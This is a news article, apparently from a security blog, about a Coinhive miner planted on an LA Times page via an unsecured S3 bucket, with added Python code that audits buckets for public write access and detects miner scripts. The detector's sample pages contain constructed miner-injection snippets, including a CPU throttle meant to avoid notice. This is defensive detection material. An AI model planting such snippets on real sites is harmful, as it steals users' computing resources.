Cryptojackers have been discovered sneaking mining code onto a big brand’s website through the back door of a poorly secured Amazon Web Services (AWS) S3 bucket.
Researchers at the Bad Packets Report said they noticed last week that The Homicide Report, an interactive map of city murders offered by the LA Times, was running a Coinhive Monero miner.
Present since at least February 9, the mining was throttled to run at a CPU level of under 30% in the hope this would allow it to go unnoticed for longer.
Ironically, what led researchers to the miner was its presence in an LA Times AWS S3 bucket – left in an unsecured state with public write permissions turned on – and not anything visible on the site itself.
Researchers even found a message suggesting someone else had discovered the open access before either Bad Packets Report or the cryptojackers. This read:
Hello, this is a friendly warning that your Amazon AWS S3 bucket settings are wrong. Anyone can write to this bucket. Please fix this before a bad guy finds it.
Unfortunately, the message went unread or unheeded and the bad guys did find out. The bucket and website were eventually cleaned by the LA Times after researchers gave them the bad news.
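The root cause described above is a bucket that anyone can write to. The check below is an added example, not code from the article, the LA Times or Bad Packets Report: it inspects a bucket ACL and a bucket policy in the shape that boto3's get_bucket_acl() and get_bucket_policy() return and reports every grant or statement that lets the public add or replace objects. The ACL and policy it runs on are constructed samples, not real buckets.

```python
"""Flag S3 bucket ACL grants and bucket-policy statements that let anyone write.

Added example. It expects data shaped like boto3's get_bucket_acl() result
(a dict with "Grants") and get_bucket_policy() result ("Policy" is a JSON
string), so it can be fed real buckets by fetching those with boto3 and
passing them in; here it runs offline on constructed samples.
"""
import json

# Well-known AWS group URIs meaning "everyone" and "anyone with any AWS account".
PUBLIC_GROUP_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
# ACL permissions and policy actions that allow adding or replacing objects.
WRITE_PERMISSIONS = {"WRITE", "FULL_CONTROL"}
WRITE_ACTIONS = {"s3:putobject", "s3:*", "*"}


def public_write_acl_grants(acl):
    """Return (group name, permission) for every public group with write access."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if (grantee.get("Type") == "Group"
                and grantee.get("URI") in PUBLIC_GROUP_URIS
                and grant.get("Permission") in WRITE_PERMISSIONS):
            findings.append((grantee["URI"].rsplit("/", 1)[-1], grant["Permission"]))
    return findings


def _as_list(value):
    """Policy fields may be a single value or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal):
    # Both `"Principal": "*"` and `"Principal": {"AWS": "*"}` mean everyone.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_write_policy_statements(policy):
    """Return the Sids of Allow statements granting write actions to everyone.

    Conditions are not evaluated, so a flagged statement with a Condition
    block still needs a human to confirm it is really open.
    """
    if isinstance(policy, str):
        policy = json.loads(policy)
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _principal_is_public(stmt.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action", []))}
        if actions & WRITE_ACTIONS:
            findings.append(stmt.get("Sid", "<no Sid>"))
    return findings


def audit_bucket(acl, policy):
    """Combine both checks into one report for a bucket."""
    return {
        "acl_public_write": public_write_acl_grants(acl),
        "policy_public_write": public_write_policy_statements(policy),
    }


# Constructed samples: an ACL that also gives AllUsers WRITE, and a policy with
# a public-read statement plus a statement letting anyone upload.
SAMPLE_ACL = {
    "Owner": {"ID": "constructed-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "constructed-owner-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "WRITE"},
    ],
}
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::constructed-bucket/*"},
        {"Sid": "AllowAnyoneToUpload", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:PutObject", "s3:PutObjectAcl"],
         "Resource": "arn:aws:s3:::constructed-bucket/*"},
    ],
})

if __name__ == "__main__":
    print(audit_bucket(SAMPLE_ACL, SAMPLE_POLICY))
```

A bucket that serves site assets only needs the web server's role to write to it; any AllUsers or AuthenticatedUsers grant with WRITE, or a policy statement letting `*` call s3:PutObject, is the condition that let the miner be planted here. Turning on S3 Block Public Access at the account level prevents such ACLs and policies from taking effect in the first place.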
The incident bears a passing resemblance to the recent cryptojacking attack on an AWS S3 bucket belonging to Tesla, although without a website being involved. In that incident, the root cause was that admins forgot to set a bucket password.
The interesting follow-up is how easily incidents can be connected to the bad actors behind them.
According to the researchers, the Coinhive site key used in this attack was the same one used two weeks ago to plant miners on thousands of websites, including government sites such as the American court system (uscourts.gov) and the UK Student Loans Company.
Coinhive reportedly terminated this account but Bad Packets alleges it was used to earn the attackers the grand sum of $24 (£17) from the time it was hiding on the LA Times site.
That doesn’t sound like a lot for up to two weeks on a big website, but this was only one page. Get the same script onto hundreds or thousands of sites for any length of time and it’s not hard to see how this business model could be lucrative.
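The researchers tied this incident to the earlier mass campaign by the Coinhive site key embedded in the page. The scanner below is an added example, not code from the article or from Bad Packets Report: it finds the Coinhive loader and miner constructor in fetched HTML, extracts the site key and throttle setting, and groups pages by site key so that separate incidents can be correlated the same way. It assumes the loader is the public coinhive.min.js and the miner is created with CoinHive.Anonymous(siteKey, {throttle: ...}); the HTML pages and the site key are constructed placeholders, not real indicators, and the CPU-cap figure assumes Coinhive's throttle is the fraction of time the miner idles.

```python
"""Detect Coinhive-style browser miners in HTML and correlate pages by site key.

Added example. Assumes the documented Coinhive client pattern
(coinhive.min.js loader plus CoinHive.Anonymous/User constructor).
All sample pages and the site key below are constructed placeholders.
"""
import re

# <script src="...coinhive.com/lib/..."> loader tag.
LOADER_RE = re.compile(
    r"""<script[^>]+src=["']([^"']*coinhive\.com/lib/[^"']*)["']""", re.IGNORECASE)
# CoinHive.Anonymous('<site key>', {options}) or CoinHive.User('<site key>', ...).
MINER_RE = re.compile(
    r"""CoinHive\.(Anonymous|User)\(\s*["']([^"']+)["']\s*(?:,\s*(\{[^}]*\}))?""")
# throttle: 0.7 inside the options object.
THROTTLE_RE = re.compile(r"throttle\s*:\s*([0-9]*\.?[0-9]+)")


def find_miners(html):
    """Return one dict per miner instance found in the page."""
    loaders = LOADER_RE.findall(html)
    findings = []
    for match in MINER_RE.finditer(html):
        mode, site_key, options = match.group(1), match.group(2), match.group(3) or ""
        throttle_match = THROTTLE_RE.search(options)
        throttle = float(throttle_match.group(1)) if throttle_match else 0.0
        findings.append({
            "site_key": site_key,
            "mode": mode,
            "throttle": throttle,
            # Assumption: throttle is the idle fraction, so 0.7 leaves roughly 30% CPU.
            "cpu_cap_percent": round((1 - throttle) * 100),
            "loader": loaders[0] if loaders else None,
        })
    return findings


def correlate(pages):
    """Group page URLs by the site key their miner reports to.

    `pages` maps URL -> fetched HTML. Pages sharing a key are being monetised
    by the same Coinhive account, which is the link the researchers used.
    """
    by_key = {}
    for url, html in pages.items():
        for finding in find_miners(html):
            by_key.setdefault(finding["site_key"], []).append(url)
    return by_key


# Constructed sample pages: two injected with the same placeholder key at
# different throttle levels, and one clean page.
SAMPLE_PAGES = {
    "https://example.com/map": """<html><head><title>Map</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('PLACEHOLDER_SITE_KEY_0000', {throttle: 0.7});
  miner.start();
</script></head><body><div id="map"></div></body></html>""",
    "https://example.org/news": """<html><head>
<script src="//coinhive.com/lib/coinhive.min.js"></script>
<script>new CoinHive.Anonymous("PLACEHOLDER_SITE_KEY_0000", {throttle: 0.5}).start();</script>
</head><body><p>News</p></body></html>""",
    "https://example.net/clean": "<html><head><title>Clean</title></head><body>Hello</body></html>",
}

if __name__ == "__main__":
    for url, html in SAMPLE_PAGES.items():
        print(url, find_miners(html))
    print(correlate(SAMPLE_PAGES))
```

Run over a crawl of your own properties, this is a cheap way to notice an injected miner before users do; the throttle value is worth recording because a low CPU cap is exactly what kept this one hidden for two weeks.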
It’s a phenomenon being driven by the mania for virtual currencies, helped along by the simplicity of the earn-as-you-go business models promoted by cryptomining services.
What damage did this do?
From the user’s point of view, not much. As long as miners are just stealing CPU time, they are a nuisance that can be stopped by shutting down the browser.
Still, what starts as a parasitic attack could, with easy access to cloud buckets and websites, quickly turn into something much more dangerous. The worry is that there appears to be no shortage of cloud targets to rummage through.
6 comments on “Unsecured AWS led to cryptojacking attack on LA Times”
I have an interesting thought on this and all the other cryptomining hijacks going on:
The people who wrote the mining software almost certainly protected it with a license agreement. Now, among other things, this agreement almost certainly included a line such as “… this software is licensed, not sold …”. It also formally declares who the true owners are (the company that wrote it).
Doesn’t that legally make them responsible for what the software is used for, when used as intended? So, the Times might very well have a lawsuit against the creators of the software.
Good luck contacting them…
Coinhive has a Twitter account now. Otherwise you’ll never find them. No names, no company registration, and no physical address have ever been provided.
I wonder why any companies – notably in North America and the EU – are comfortable giving 30% of anything to a faceless group like that.
Here’s a thing: if it comes out in the future that the money was going to, say, North Korea or so-called Islamic State (this is a thought exercise, not an accusation!)…
…could companies that had knowingly used the services in the past be held retrospectively liable for violating laws about trading with proscribed countries or groups?
I can’t wait till the threat actors realize they can chain attacks to make potentially more money. Start with crypto-mining on a compromised system, while stealing some data, and plant ransomware. If the crypto-mining is discovered and stopped, the bad guys can turn around and threaten release of data (doxing) they stole if they don’t allow mining to continue. If they won’t comply, sell the data, then release it at a future date, and finally let the ransomware loose on them. This would possibly create more exposure to getting caught, for the bad guys, but oh what a headache that would be to deal with from the victim’s point of view.
Ransomware attacks, when investigated afterwards with care, not infrequently throw up detections for other malware – notably cryptomining and credential stealers – that has been around for a while.
In some cases it’s reasonable to assume that where one crook could break in, so could another…
…but in others it’s a fair guess that the ransomware attack was a last roll of the die by the same crooks who had been in for a while.